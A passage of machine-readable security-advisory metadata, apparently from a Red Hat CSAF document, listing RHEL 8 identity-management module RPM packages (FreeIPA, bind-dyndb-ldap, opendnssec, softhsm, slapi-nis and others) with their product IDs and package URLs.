"product_id": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1)",
"product_id": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1)",
"product_id": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"product": {
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm (idm:client)",
"product_id": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product": {
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client)",
"product_id": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product": {
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client)",
"product_id": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product": {
"name": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client)",
"product_id": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product": {
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client)",
"product_id": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product": {
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client)",
"product_id": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm (idm:DL1)",
"product_id": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm (idm:DL1)",
"product_id": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-dns@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaserver@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipatests@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product": {
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1)",
"product_id": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product": {
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1)",
"product_id": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"product_identification_helper": {
